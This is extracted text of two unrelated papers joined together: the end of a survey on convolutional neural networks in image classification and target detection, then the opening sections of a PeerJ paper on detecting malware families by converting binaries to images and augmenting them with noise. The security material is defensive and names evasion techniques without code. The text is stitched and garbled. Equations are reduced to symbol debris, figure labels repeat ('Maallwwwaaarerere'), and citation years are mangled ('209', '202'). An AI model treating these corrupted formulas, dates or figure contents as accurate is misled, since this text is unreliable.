fine-tuning, so that the generalization performance is greatly improved. Ⅳ. APPLICATION OF CNN IN IMAGE RECOGNITION Image classification is an image processing technique that identifies different things by the characteristic information given by the image. With the rise of machine learning, automatic image classification techniques have been applied in various development fields. Cao used the classical convolutional neural network VGG-16 as a prototype in the literature[20], and added a multi-scale sampling layer at the end of the convolutional part, so that the model can input any size of images for training and testing, while reducing the number of neurons in the full connection layer, which improves the training speed of the model while ensuring accuracy, and applies it to the problem of multi-attribute classification of human faces. In the literature[21], Wenxu Shi proposed a CNN-based multiscale approach combined with a feature extraction algorithm for reverse convolutional networks (MSDCNN) and classified adenocarcinoma pathology images. Classification experiments performed on adenocarcinoma pathology cell images showed that the MSDCNN algorithm improved the classification International Journal of Advanced Network, Monitoring and Controls Volume 05, No.02, 2020 37 accuracy of the final convolutional feature scale by about 14% over the conventional CNN algorithm and about 1.2% over the classification accuracy of the fusion network model approach, which is also based on multi-scale features. In the literature[22], Chunlei Zhang proposed a parallel network model based on convolutional neural networks for military target image classification. The method uses two edge detection operators to extract the target image features separately and then input them into the convolutional neural network for deep feature extraction, which improves the classification recognition rate by 1.2% and reaches 97% compared to theconventional convolutional neural network. The theoretical analysis and experimental data illustrate that the model enables the effective differentiation of military target image data and is important for the accurate provision of military operational information. Target detection is a fundamental problem in the field of machine vision as well as artificial intelligence, whose main goal is to pinpoint the category and location border information of various targets in an image. Target detection algorithms based on convolutional neural networks, such as RCNN, Fast RCNN, Faster RCNN, Mask RCNN, etc., are widely used in security monitoring, intelligent transportation and image retrieval and other fields. A target detection algorithm based on multi-scale feature extraction was proposed by Jianghao Rao in the literature[23] and applied to the detection of infrared pedestrian small targets with better results than conventional networks. A Mask-RCNN-based method for building target detection was proposed by Dajun Li et al. in the literature[24]. In the literature[25], Ding Peng "fine-tuned" a variety of mainstream depth convolutional neural networks based on Faster RCNN detectors on two classical data sets for target detection of optical remote sensing images. In response to the problem of target detection in traffic roads, Zhang Qi et al. proposed a traffic target detection method based on anchor point clustering, all-anchor point training strategy and reinforced intersection and merger ratio (SIoU) in the literature[26]. Ⅴ. CONCLUSION This paper describes the basic structure of classical CNN from the development of CNN, briefly analyzes the features of CNN that have been improved and optimized in the development process, and finally elaborates on the wide application of CNN in the field of image classification and target detection. CNN have been developed to date and occupy an important position in the field of image recognition. In terms of current trends, CNN will continue to evolve and makeCNNsuitable for various application scenarios, such as 3D CNN facing video understanding. There are also challenges, such as limited data sets, network generalization performance, robustness to be improved, and high training costs. The aforementioned issues will be a direct driver for the future development of convolutional neural networks and will directly contribute to the further deepening of artificial intelligence. ACKNOWLEDGMENT This work is supported by the Natural science foundation of Shaanxi province(2019JM-603). REFERENCES [1] Hinton G E, Salakhutdinov R R , Reducing the dimensionality of data with neural networks[J].Science, 2006,313(5786):504-507. [2] Rumelhart D E, Hinton G E, Williams RJ. Learning representations by back-propagating errors[J].Nature, 1986, 323:533-538. [3] Y. LeCun, L. Bottou, Y. Bengio, and P. Haffner. Gradient-based learning applied to document recognition. Proceedings of the IEEE, november 1998. [4] LeCun Y, Cortea C. MNIST handwritten digit database[EB/OL].http://yann.lecun.com/exdb/mnist, 2010. [5] K. Simonyan and A. Zisserman. Very Deep Convolutional Networks for Large-Scale Image Recognition. [6] He K, Zhang x, Ren S, et al. Deep residual learning for image recognition[EB/OL].http://arxiv.org/abs/1512.03385,2015. [7] Gu Jiu-Xiang, Wang Zhen-Hua, Jason Kuen,etal. Recentadvances in convolutional neural networks. arXiv:1512.07180v5,2017. [8] X. Glorot, Y. Bengio. Understanding the difficulty of training deep feedforward neural networks. AISTATS, 2010 International Journal of Advanced Network, Monitoring and Controls Volume 05, No.02, 2020 38 [9] Lecun Y, Boser B, Denker J S, etal. Back propagation applied to handwritten zip code recognition[J]. Neural Computation, 1989, 1(4):541-551. [10] Krizhevsky A，Sutskever I,Hinton G E.Imagenet classifi-cation with deep convolutional neural networks[C]//Advances in Neural Information Processing Systems，2012：1097-1105. [11] Bengio Y，Simard P，Frasconi P.Learning long-term depen-dencies with gradient descent is difficult[J].IEEE Transac-tions on Neural Networks, 1994, 5(2):157-166. [12] Christian Szegedy, Wei Liu, Yangqing Jia, Pierre Sermanet, Scott Reed, Dragomir Anguelov, Dumitru Erhan, Vincent Vanhoucke, Andrew Rabinovich, Going Deeper with Convolutions, Arxiv Link: http://arxiv.org/abs/1409.4842. [13] Rougui J E, Istrate D, Souidene W, et al. Audio Based Sur-veillance for Cognitive Assitance Using a CMT Microphonewithin Socially Assistive Living [J]. 2009, 2009 (2009):2547-2550.] [14] Lin, Min, Qiang Chen, and Shuicheng Yan. Network in network. arXiv preprint arXiv:1312.4400 [15] Zang D, Chai Z, Zhang J, et al. Vehicle license plate recog-nition using visual attention model and deep learning[J].Journal of Electronic Imaging, 2015, 24(3):033001. [16] Xv Shanshan. Research and application of convolutional neural network [D]. Nanjing forestry university, 2013. [17] Hinton G E, Srivastava N, Krizhevsky A, et al． Improving neural networks by preventing co-adaption of feature detectors[ Ｒ /OL].[2015-10-26]. http: / / arxiv. org / pdf /1207． 0580v1． [18] Wan L, Zeiler M, Zhang S, et al. Regularization of neural networks using drop connect [C] / / Proceedings of the 2013 Inter-national Conference on Machine Learning. New York: ACM Press, 2013: 1058－1066. [19] Luo Ke, Zhou Anzhong,Luo Xiao. A Convolutional neural network training strategy using knowledge transfer[J]. Control and decision-making, 2019, 034 (003) : 511-518. [20] Cao Ge. Research on face image classification application based on deep convolutional neural network [D]. Jilin university, 2019. [21] Shi Wenxu, Jiang Jinhong, Bao Shengli. Application of improved convolutional neural network in pathological image classification of adenocarcinoma[J]. Science, technology and engineering, 209,19 (35) : 279-285. [22] Zhang Chun-lei. Military target image classification technology based on parallel convolutional neural network[J]. Electronic design engineering, 209,27 (08) : 76-80. [23] Rao Jianghao. Target identification, positioning and detection based on CNN integration [D]. University of Chinese academy of sciences (institute of optoelectronic technology, Chinese academy of sciences), 2018. [24] Li Dajun, He Weilong, Guo Bingxuan,Li Maosen, Chen Minqiang. Building target detection algorithm based on Mask - RCNN[J]. Science of surveying and mapping, 202,44 (10) : 172-180. [25] DingPeng. Research on optical remote sensing target detection technology based on deep convolutional neural network [D]. University of Chinese academy of sciences (changchun institute of optics, precision mechanics and physics, cas), 2019. [26] Zhang Qi, Ding Xintao, Wang Wanjun, SZhou Wen. Traffic target detection method based on Faster RCNN [J]. Journal of west anhui university, 202,35 (05) : 50-55. http://www.elecfans.com/tags/pi/ http://arxiv.org/abs/1409.4842 work_oa2gtpcm7vdbji3sjl376w7e2u ---- Data augmentation based malware detection using convolutional neural networks Data augmentation based malware detection using convolutional neural networks Ferhat Ozgur Catak1, Javed Ahmed2, Kevser Sahinbas3 and Zahid Hussain Khand4 1 Simula Research Laboratory, Fornebu, Norway 2 Center of Excellence for Robotics, Artificial Intelligence and Blockchain (CRAIB), Department of Computer Science, Sukkur IBA University, Sukkur, Pakistan 3 Department of Management Information System, Istanbul Medipol University, Istanbul, Turkey 4 Department of Computer Science, Sukkur IBA University, Sukkur, Pakistan ABSTRACT Due to advancements in malware competencies, cyber-attacks have been broadly observed in the digital world. Cyber-attacks can hit an organization hard by causing several damages such as data breach, financial loss, and reputation loss. Some of the most prominent examples of ransomware attacks in history are WannaCry and Petya, which impacted companies’ finances throughout the globe. Both WannaCry and Petya caused operational processes inoperable by targeting critical infrastructure. It is quite impossible for anti-virus applications using traditional signature-based methods to detect this type of malware because they have different characteristics on each contaminated computer. The most important feature of this type of malware is that they change their contents using their mutation engines to create another hash representation of the executable file as they propagate from one computer to another. To overcome this method that attackers use to camouflage malware, we have created three-channel image files of malicious software. Attackers make different variants of the same software because they modify the contents of the malware. In the solution to this problem, we created variants of the images by applying data augmentation methods. This article aims to provide an image augmentation enhanced deep convolutional neural network (CNN) models for detecting malware families in a metamorphic malware environment. The main contributions of the article consist of three components, including image generation from malware samples, image augmentation, and the last one is classifying the malware families by using a CNN model. In the first component, the collected malware samples are converted into binary file to 3-channel images using the windowing technique. The second component of the system create the augmented version of the images, and the last part builds a classification model. This study uses five different deep CNN model for malware family detection. The results obtained by the classifier demonstrate accuracy up to 98%, which is quite satisfactory. Subjects Artificial Intelligence, Security and Privacy Keywords Convolutional neural networks, Cybersecurity, Image augmentation, Malware analysis INTRODUCTION Recently our usage of technical gadgets has increased due to the aggressive invasion of technology in our daily life. The frequency of use for many devices has increased many How to cite this article Catak FO, Ahmed J, Sahinbas K, Khand ZH. 2021. Data augmentation based malware detection using convolutional neural networks. PeerJ Comput. Sci. 7:e346 DOI 10.7717/peerj-cs.346 Submitted 16 September 2020 Accepted 2 December 2020 Published 22 January 2021 Corresponding author Ferhat Ozgur Catak, ozgur@simula.no Academic editor Robertas Damaševičius Additional Information and Declarations can be found on page 24 DOI 10.7717/peerj-cs.346 Copyright 2021 Catak et al. Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.346 mailto:ozgur@�simula.�no https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.346 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ folds, including mobile phones, laptops, webcams, etc. Motivated by market demand, the manufacturers have started to produce devices with attractive features ignoring the security weakness caused by offering such features. Due to the fierce competition among the manufacturers and rapid product development, many products are released to the market with security weaknesses. This offers many opportunities for malicious software developers. Malicious software, commonly known as malware, is intentionally designed to damage computer systems and exploit security weaknesses. Malware is designed for a specific target, often attempting to camouflage itself in another way, with intentions such as file encryption, ransom, preventing a system from working, gaining unauthorized access to a network, data theft, or sabotage. Malware targets various platforms such as servers, personal computers, mobile phones, and cameras to disrupt the system’s normal function. Malware development has become a serious activity lately, and in the only first quarter of 2020, around 1046.10 million new malware has been found (https://www. av-test.org/en/statistics/malware/). Malware has acquired advanced competencies and diversity in features, which significantly raises the importance of cybersecurity. Cybersecurity activities in various organizations have increased (Shamshirband et al., 2020; Shamshirband & Chronopoulos, 2019) due to its vital importance to the aforementioned problem. One of the essential cybersecurity activities is malware analysis. In order to be effectively protected from malware, the first thing to do is to recognize the malicious software and analyze their behavior well. In this respect, the critical point is to identify malicious software and classify them successfully. A family of malicious software also represents the malicious behavior to which it belongs. As a result, the countermeasures to be taken against these behaviors may vary according to malicious software families. Several consecutive operations are generally performed within malware analysis. This task is mainly done using static and dynamic analysis methods, including the strings command to get the malicious IP addresses, entropy value if the suspicious executable file, executing the file in an isolated environment to record its behaviour. Figure 1 provides the new malicious programs number detected per year from 2003 to 2010. In the period of 2007 and 2008, the number of new threats has increased significantly due to an increase in the power of antivirus centers processing threats and the evolution in file-infecting technologies. In 2009 almost the same number of new malicious programs was detected as approximately 15 million (https://securelist.com/ kaspersky-security-bulletin-2009-malware-evolution-2009/36283/). In 2010, malware evolution has been almost identical to the previous one (https://securelist.com/kaspersky- security-bulletin-malware-evolution-2010/36343/). Figure 2 presents the number of new malware identified per year from 2011 to 2020. It is observed a noticeable increase in the number of new malicious programs year by year. Overall, malware activity has increased from 2011 to 2020. Malware developers, on the other hand, develop a variety of anti-analysis techniques with their broad knowledge of existing analysis methods. Anti-debugging and anti- disassembly techniques are the two methods most commonly used by malware developers. Such methods to bypass analysis are generally used to produce erroneous results by the Catak et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.346 2/26 https://www.av-test.org/en/statistics/malware/ https://www.av-test.org/en/statistics/malware/ https://securelist.com/kaspersky-security-bulletin-2009-malware-evolution-2009/36283/ https://securelist.com/kaspersky-security-bulletin-2009-malware-evolution-2009/36283/ https://securelist.com/kaspersky-security-bulletin-malware-evolution-2010/36343/ https://securelist.com/kaspersky-security-bulletin-malware-evolution-2010/36343/ http://dx.doi.org/10.7717/peerj-cs.346 https://peerj.com/computer-science/ disassembler and debugger tools. In anti-debugging methods, malware developers often manipulate pointer address parameters used by jump op-code such as jz, jnz, jze. Anti-debugging techniques are used by the developers to ensure that malware samples do not run under a debugger, and in that case, change the execution flow accordingly. In most cases, the reverse engineering process will be slow down by the anti-debugging technique. Figure 1 Number of new malicious programs identified per year from 2003–2010. Full-size DOI: 10.7717/peerj-cs.346/fig-1 Figure 2 Number of new malicious programs identified per year from 2011–2020. Full-size DOI: 10.7717/peerj-cs.346/fig-2 Catak et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.346 3/26 http://dx.doi.org/10.7717/peerj-cs.346/fig-1 http://dx.doi.org/10.7717/peerj-cs.346/fig-2 http://dx.doi.org/10.7717/peerj-cs.346 https://peerj.com/computer-science/ The automated malware detection systems used these days do not yield very successful results due to the aforementioned reasons. Proper malware labeling is a challenging issue in this domain. An anti-virus application can detect malware as a trojan, whereas the same malware is labeled as a worm by another anti-virus application. It has become even more complicated with the advent of sophisticated malware. With the development of machine learning, it has been observed that these techniques are being used in the field of malware analysis. To use API calls as the feature vector is one of the first usages of machine learning algorithms for malicious software analysis (Mira, 2019). N-grams are other commonly used methods for the quantification of API calls. The main reasons for using n-grams are to reduce computation-complexity of the model, to create a simple term-frequency × inverse-document-frequency (TF-IDF) matrix, and to use traditional algorithms such as random forests, decision tree, and support vector machine (SVM). Although such an approach has produced high classification performance results, they remain inadequate for the current malware infection methods. Malware analysts need sandbox applications to create API call datasets because a sandbox provides an isolated virtual machine (VM) with a secure and close network environment. The behaviour of malicious software runing in the VM are recorded. However, malware developers use anti-VM and anti-sandbox methods that integrate various virtual machine detection code snippets into their malicious code blocks. If the malicious software gets the impression of executing on a virtual machine or sandbox environment, then it changes its behaviour to complicate the analysis. The most widely used anti-VM and anti-sandbox methods are “Checking CPUID Instruction”, “VMWare Magic Number”, “Checking for Known Mac Addresses”, “Checking for Processes Indicating a VM”, “Checking for Existence of Files Indicating a VM” and “Checking for Running Services”. Although malware changes its behaviour and blocks dynamic analysis, some machine learning methods can be used to obtain malware families depending on the malware code. Currently, the approach used for malware analysis is based on creating a grayscale image from malware code and then using classification algorithms. We created classification models by extracting only the behaviour of malware samples in our previous works (Catak & Yazı, 2019; Yazı, Catak & Gul, 2019; Catak et al., 2020). We executed all the malware samples in the Cuckoo sandbox environment. whereas, in this study, harmful software did not operate in an isolated sandbox environment. This research’s main contribution is to develop a data augmentation enhanced malware family classification model that exploits augmentation for malware variants and takes advantage of a convolutional neural network (CNN) to improve image classification. Herein, we demonstrate that the data augmentation-based 3-channel image classification can significantly influence malware family classification performance. Malware developers use different methods to camouflage the malicious behaviour of malware while executing. There is no real execution phase in an operating system in our approach. Another technique that malware developers apply is to put various modifications (such as noise) to the content when they propagate from one computer to another. Catak et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.346 4/26 http://dx.doi.org/10.7717/peerj-cs.346 https://peerj.com/computer-science/ We used data augmentation methods to solve this camouflage technique to our malware image samples to detect their variants. The rest of the article is organized as follows: “Related Work” briefly describes the related work. In “System Model”, we present the system model and consists of two subsections. The first subsection presents the image conversion, and the second subsection presents the data augmentation. “Proposed Approach” provides fine-grained details of the proposed approach and presents the malware classification algorithm. “Experiments” provides an extensive analysis of results. Finally, in “Conclusion and Future Work”, we conclude the article and present some future research directions. RELATED WORK Malware analysis field has gained considerable attention from research community with rapid development of various techniques for malware detection. There is huge research literature in this area. Since the proposed work is related to image-based analysis using deep learning techniques, the relevant research literature regarding image processing techniques for malware detection are briefly discussed in this section. One of the early studies conducted on malware images was done by Nataraj et al. (2011). The authors proposed an image texture analysis-based technique for visualization and classification of different families of malware. This approach converts malware binaries into grayscale images. Malware are classified using K-nearest neighbor technique with Euclidean method. However, the system requires pre-processing of filtering to extract the image texture as features for classification. On the other hand, to extract the image texture as features for classification, the system requires pre-processing of filtering. Kancherla & Mukkamala (2013) proposed a low-level texture feature extraction technique for malware analysis parallel to Nataraj’s technique. The authors converted malware binaries into images and then extracted discrete wavelets transform based texture features for classification. Makandar & Patrot (2017) identify new malware and their variants to extract wavelet transforms-based texture features, and then supply to feed forward artificial neural network for applying classification. Kosmidis & Kalloniatis (2017) described a two-step malware variant detection and classification method. In the first step, binary texture analysis applied through GIST. In the second step, these texture features classified by using machine- learning techniques such as classification and clustering to identify malware. Although the works mentioned above Nataraj et al., 2011; Kancherla & Mukkamala, 2013; Makandar & Patrot, 2017; Kosmidis & Kalloniatis (2017) are helpful to detect and classify new malware and their variants, they still have some limitations. For instance, on the one hand, global texture features lose local information needed for classification. On the another hand, they have significant computation overheads to process a vast amount of malware. According to Zhang et al. (2016), the malware classification problem can be converted into an image classification problem. Their study provides to disassembles executable files into opcode sequences and then convert opcode into images for identifying whether the source file is benign or malware by using CNN. Yue (2017) presents multifamily Catak et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.346 5/26 http://dx.doi.org/10.7717/peerj-cs.346 https://peerj.com/computer-science/ malware classification approach by applying CNN. However, the performance is degraded due to the imbalance of malware families. The author proposes softmax loss function to mitigate this issue. This approach is reactive in nature to deal with scenarios where class imbalance is assumed. The other work by Ni, Qian & Zhang (2018) propose a method for malware classification by applying deep learning techniques. Their algorithm uses SimHash and CNN techniques for malware classification. The algorithm converts the malware codes that is disassembled into grayscale images used SimHash algorithm and after that uses CNN to identify their family. The performance improvement is ensured by using some methods such as bilinear interpolation, multi-hash and major block selection during the process. Cui et al. (2018) propose a method that applies CNN with the Bat algorithm together in order to robust the accuracy of the model. Their implemented method converts the malicious code into grayscale images. The method’s images are classified by using a CNN and Bat algorithm is used to address the issue of data imbalance among different malware families. The main limitation of this approach is that they used one evaluation criterion to test the model. The other work by Nisa et al. (2020) suggest a new approach using malware images with rotate, flip and scale base image augmentation techniques. Two stage deep learning neural network is used by Tobiyama et al. (2016) for infection detection. Initially, the authors generated an image via the extracted behavioral features from the trained recurrent neural network. Later, to classify the feature images, they used CNN. An approach to derive more significant byte sequence in a malware was proposed by Yakura et al. (2018). The authors used CNN with attention mechanism to achieve this for the images converted from binaries. MalNet method for malware detection was proposed by Yan, Qi & Rao (2018). The method automatically learns essential features from the raw data. The method generates grayscale images from opcode sequences. Later, CNN and LSTM are used to learn important features from the grayscale images. Fu et al. (2018) proposed an approach to visualize malware as an RGB-colored image. Malware classification is performed by merging global and local features using random forest, K-nearest neighbor, and support vector machine. The approach realizes fine-grained malware classification with low computational cost by utilizing the combination of global and local features. Liu et al. (2019) proposed a malware classification framework based on a bag-of-visual-words (BoVW) model to obtain robust feature descriptors of malware images. The model demonstrates better classification accuracy even for more challenging datasets. The major limitation of this approach is higher computational cost. Chen et al. (2019) conducted an extensive study on the vulnerabilities of the CNN-based malware detectors. The authors proposed two methods to attack recently developed malware detectors. One of these methods achieve attack success rate over 99% which strongly demonstrates the vulnerability of CNN-based malware detectors. The authors also conducted experiments with pre-detection mechanism to reject adversarial examples and shown its effectiveness in improving the safety and efficiency of malware Catak et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.346 6/26 http://dx.doi.org/10.7717/peerj-cs.346 https://peerj.com/computer-science/ detectors. Venkatraman, Alazab & Vinayakumar (2019) used similarity mining and deep learning architecture to identify and classify obfuscated malware accurately. The authors used eight different similarity measures to generate similarity matrices and to identify malware family by adopting images of distance scores. The advantage of this approach is that it requires less computational cost as compared to classical machine learning based methods. Dai et al. (2018) proposed a malware detection method using hardware features due to inherent deficiencies in software methods. The approach dumps the malware memory of runtime to binary files, then grayscale image is extracted from the binary files. A fixed size images are generated from the grayscale image and histogram of gradient is used to extract image features. Finally, malware classification is done using the popular classifier algorithms. One of the limitations for this approach is that it cannot provide against fileless malware. Gibert et al. (2019) propose a file agnostic deep learning approach for malware classification. The malicious software are grouped into families based on a set of discriminant patterns extracted from their visualization as images. Yoo, Kim & Kang (2020) propose multiclass CNN model to classify exploit kits. On of the root of malware contamination are exploit kits. This type of attack has rapidly increased and detection rate is quite low. The authors proposed limited grayscale, size-based hybrid model and recursive image update method to enhance classification accuracy. Traditional machine learning methods are applied in most of the existing state of the art. Our study uses a deep learning method and differs from most other studies examined in this section. Deep learning methods are not algorithmically new and easy to implement. They can be trained with high-performance computations on systems such as GPUs. Today, they have become prevalent in the field of machine learning. Some of the studies examined also used deep learning methods, but our approach differs from these studies because we used five different deep CNN models for malware family classification. It is evident from the results that 3-channel image classification can significantly influence malware family detection’s performance. The main contribution that makes this study stand out regarding the existing state of art examined in this section is applying data augmentation enhanced malware family classification model. This model exploits augmentation for variants of malware clones and take advantage of CNN to improve image classification. SYSTEM MODEL The system architecture of the proposed model is composed into three different components. The first component is image conversion of malware samples using decimal representation and entropy values of each byte. The second component is image augmentation component. The last one is CNN based malware family classification. Image conversion We used our publicly available malware dataset for this approach (https://github.com/ ocatak/malware_api_class. Malware samples collected from Github platform, in the first Catak et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.346 7/26 https://github.com/ocatak/malware_api_class https://github.com/ocatak/malware_api_class http://dx.doi.org/10.7717/peerj-cs.346 https://peerj.com/computer-science/ step, are labeled using ClamAV open source command-line antivirus software. The model architecture is illustrated in Fig. 3. Every malware sample is split into their bytes. In the second step, each byte is converted from bit representations to decimal representation for the red channel. For instance, the byte representation with 10010110 is converted to 150 as the decimal representation. In the third step, we calculated the entropy value of the byte representations. As an example of the same byte value of 10010110, the entropy value is 1. The input of the first component of the malware detection system is a collection of malware stored in different formats such as portable executable, Word, PDF. These malware are then converted into 3-channels PNG files as shown in Fig. 3. Trojan.KillAv 0100101 0 1010101 0 0010101 0 0101001 0 R1 R2 R3 R4 R5 R6 R7 R8 R9 R10 R11 R12 R13 R14 R15 R16 R17 R18 R19 R20 G1 G2 G3 G4 G5 G6 G7 G8 G9 G10 G11 G12 G13 G14 G15 G16 G17 G18 G19 G20 B1 B2 B3 B4 B5 B6 B7 B8 B9 B10 B11 B12 B13 B14 B15 B16 B17 B18 B19 B20 Red channel with decimal values of each byte Green channel with entropy values of each byte Blue channel Zero channel Win.Malware.Zusy 0100101 0 1010101 0 0010101 0 0101001 0 R1 R2 R3 R4 R5 R6 R7 R8 R9 R10 R11 R12 R13 R14 R15 R16 R17 R18 R19 R20 G1 G2 G3 G4 G5 G6 G7 G8 G9 G10 G11 G12 G13 G14 G15 G16 G17 G18 G19 G20 B1 B2 B3 B4 B5 B6 B7 B8 B9 B10 B11 B12 B13 B14 B15 B16 B17 B18 B19 B20 Red channel with decimal values of each byte Green channel with entropy values of each byte Blue channel Zero channel Win32/Expiro 0100101 0 1010101 0 0010101 0 0101001 0 R1 R2 R3 R4 R5 R6 R7 R8 R9 R10 R11 R12 R13 R14 R15 R16 R17 R18 R19 R20 G1 G2 G3 G4 G5 G6 G7 G8 G9 G10 G11 G12 G13 G14 G15 G16 G17 G18 G19 G20 B1 B2 B3 B4 B5 B6 B7 B8 B9 B10 B11 B12 B13 B14 B15 B16 B17 B18 B19 B20 Red channel with decimal values of each byte Green channel with entropy values of each byte Blue channel Zero channel ... Figure 3 The architecture of the proposed 3-channel image representation of malware samples. Given input malware samples, RGB representations are computed by applying as explained in “Basic Idea”. Full-size DOI: 10.7717/peerj-cs.346/fig-3 Catak et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.346 8/26 http://dx.doi.org/10.7717/peerj-cs.346/fig-3 http://dx.doi.org/10.7717/peerj-cs.346 https://peerj.com/computer-science/ Figure 4 shows an example pixel generation process. Each byte value of the executable file is converted to its decimal representation for the red-channel, and the corresponding entropy value for the blue-channel. Data augmentation The key problem with malware detection model is data diversity. There are many alternative methods are available for solving these problems. One approach to solve this problem involves the use of data augmentation. Data augmentation can be defined as a strategy to artificially increase the variety of input instances for training phase, without really collecting new instances. Additive noise is the most used technique for data augmentation to build reliable machine learning models. Gaussian, Laplacian and Poisson noises are the most used techniques to enhance the input dataset. Laplacian noise is derived eventually from white (Gaussian) noise (Hida & Si, 2008). They are the most used additive noise techniques to improve and enhance the image datasets (Harmsen & Pearlman, 2003; Holmstrom & Koistinen, 1992). Additive Gaussian Additive Gaussian noise is a fundamental noise model used in information theory to simulate the impact of many random methods that happen in nature (Selesnick, 2008). The Additive Gaussian noise flow is represented by a series of outputs Yi at a discrete-time event index i. Yi is the sum of the input Xi and noise, Zi, where Zi is independent and 1011 0110 0011 1110 1111 1011 0011 1000 0110 1011 0001 1110 0111 0100 0101 0111 0110 0110 0111 0111 0101 0100 0001 1110 0010 0100 1001 1111 0101 0011 1100 1110 1010 0100 1111 0101 1000 0011 0101 0111 0000 1110 0000 1100 1100 1100 1111 0100 0110 1011 0111 0001 1001 0111 0100 0001 0110 1000 0101 1000 1101 0011 1001 1001 0101 0101 0111 0011 1011 0111 0101 0110 1110 0111 1110 1110 1101 1101 1111 0101 182 62 251 56 107 30 116 87 102 119 84 30 36 159 83 206 164 245 131 87 14 12 204 244 107 113 151 65 104 88 211 153 85 115 183 86 231 238 221 245 0,9544 0,9544 0,5436 0,9544 0,9544 1 1 0,9544 1 0,8113 0,9544 1 0,8113 0,8113 1 0,9544 0,9544 0,8113 0,9544 0,9544 0,9544 0,8113 1 0,9544 0,9544 1 0,9544 0,8113 0,9544 0,9544 0,9544 1 1 0,9544 0,8113 1 0,8113 0,8113 0,8113 0,8113 Executable Maallwwwaaarerere DecimaDDecimall - ReRedd ChannelCha Entropy - Greenn ChannelC el Figure 4 Example process of pixel generation from the opcode. Full-size DOI: 10.7717/peerj-cs.346/fig-4 Catak et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.346 9/26 http://dx.doi.org/10.7717/peerj-cs.346/fig-4 http://dx.doi.org/10.7717/peerj-cs.346 https://peerj.com/computer-science/ identically distributed and picked from a zero-mean normal distribution, including variance N. The Zi are further assumed to not be correlated with the Xi. Zi � Nð0; NÞ Yi ¼ Xi þ Zi (1) Additive Poisson Poisson noise is a kind of noise that can be represented by a Poisson process (Wojtkiewicz et al., 1999). A discrete random variable X is said to have a Poisson distribution with parameter λ > 0, if, for k = 0, 1, 2, : : : , the probability mass function of X is given by: f ðk; �Þ ¼ PrðX ¼ kÞ ¼ � ke�� k! (2) where e is Euler’s number, and k! is the factorial of k. Additive Laplace The Laplace distribution is a continuous probability distribution that sometimes described the double exponential distribution because it can be considered as two exponential distributions with an extra location parameter joined together (Marks et al., 1978). A random variable has a Laplace distribution if its probability density function is f ðxjm; bÞ ¼ 1 2b exp � jx � mj b � � ¼ 1 2b exp � m � x b � � if x , m exp � x � m b � � if x � m 8>< >: (3) Malware development Malware developers try to hide the malicious code snippets they place on legitimate software from malware analysts and antivirus programs using different methods. In addition, malware software developers use codes and frameworks that belong to malware families that perform similar malicious activities, rather than rebuilding malware code fragments. For this reason, when these malware are converted into a executable file (example: PE for Windows) to be suitable for the target platform on which they will be run, they are very similar when binary analysis is performed. The signature-based security components used today are very vulnerable to changes in the code, which reduces their detection capabilities. Developers generally use two different methods to replace the malicious code content when contaminated software infects from one host computer to another computer; polymorphic and metamorphic malware. In Metamorphic malware, the situation is a bit more complicated. Although the obfuscation techniques are applied in the same way, this time the code flux is changed. As seen in Fig. 5, a typical metamorphic malware has more components and its structure has become more complex. This time malware has different components such as Catak et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.346 10/26 http://dx.doi.org/10.7717/peerj-cs.346 https://peerj.com/computer-science/ disassembler, code analyzer/permutator, code transformer, assembler, and malicious payload. PROPOSED APPROACH This section presents the results of the data augmentation, data enhancement-based CNN malware classification algorithm. The basic idea of Augmented-CNN based malware classification techniques is introduced in “Basic Idea”. The implementation of the porposed technique is described in “Implementation of the Model”. Figure 6 shows the flowchart of the overall method. The process of malware classification includes the following steps in the proposed solution: � The system creates RGB images using Decimal Conversion, Entropy Conversion and Zeros � Gaussian, Poisson, and Laplace noises with their combinations are added to images to enhance the input dataset. � In the third step the system builds a CNN based classification model. Basic idea As previously mentioned in “Malware Development”, malware developers are trying to evade security components using different methods. These methods are usually in the form of adding noise to the executable files’ binary form. One of the areas dealing with noisy data is the image classification task. One of the methods used to overcome this Figure 5 Typical metamorphic malware propagation. Full-size DOI: 10.7717/peerj-cs.346/fig-5 Catak et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.346 11/26 http://dx.doi.org/10.7717/peerj-cs.346/fig-5 http://dx.doi.org/10.7717/peerj-cs.346 https://peerj.com/computer-science/ problem and to classify images from different angles in a more reliable way is the image augmentation technique. As part of this study, malware samples have been converted to 3-channel images. The evasion techniques that malware developers have added are reflected in these images as noise. We used image augmentation techniques in this study so that the noise in the images does not affect the classification performance. We used the imgaug Python library for implementation and increased our dataset to 5 times using AdditiveGaussian, AdditiveLaplace and AdditivePoisson noise addition methods. In Fig. 7, new images are created with different laplace noises for Trojan/Win32. VBKrypt.C122300 malware. Our main tasks are to enhance data using data augmentation and classify malware samples according their family using malware images based CNN model. Malware images’ basic idea is create multi-channel images using byte streams and entropy values of each 8-bits streams. Table 1 presents notations to evaluate the malware classifier model performance and the commonly used variables is presented for convenience. Analysis of the proposed algorithm The reason behind of this study is the idea that using the law of large numbers theory, we have opportunity to obtain more accurate classifier model (for this work malware classification) by creating new samples that is comparable to original models which are created with original input instances. Start Red channel (Decimal Conversion) Green channel (Entropy Convertion) Blue channel (Zeros) Image Repository Gaussian Noise Poisson Noise Laplace Noise Image repository Train test split for the dataset with new label Xtrain, Xtest, Ytrain, Ytrain ← train test split(X, Yc, 0.8) Build CNN classifier h and evaluate the h using Xtest, Ytest Im ag e C o n versio n Red channel (Decimal Conversion) Green channel (Entropy Convertion) Blue channel (Zeros) Image Repository N o ise Gaussian Noise Poisson Noise Laplace Noise Image repository Figure 6 Flow chart of the overall system. Full-size DOI: 10.7717/peerj-cs.346/fig-6 Catak et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.346 12/26 http://dx.doi.org/10.7717/peerj-cs.346/fig-6 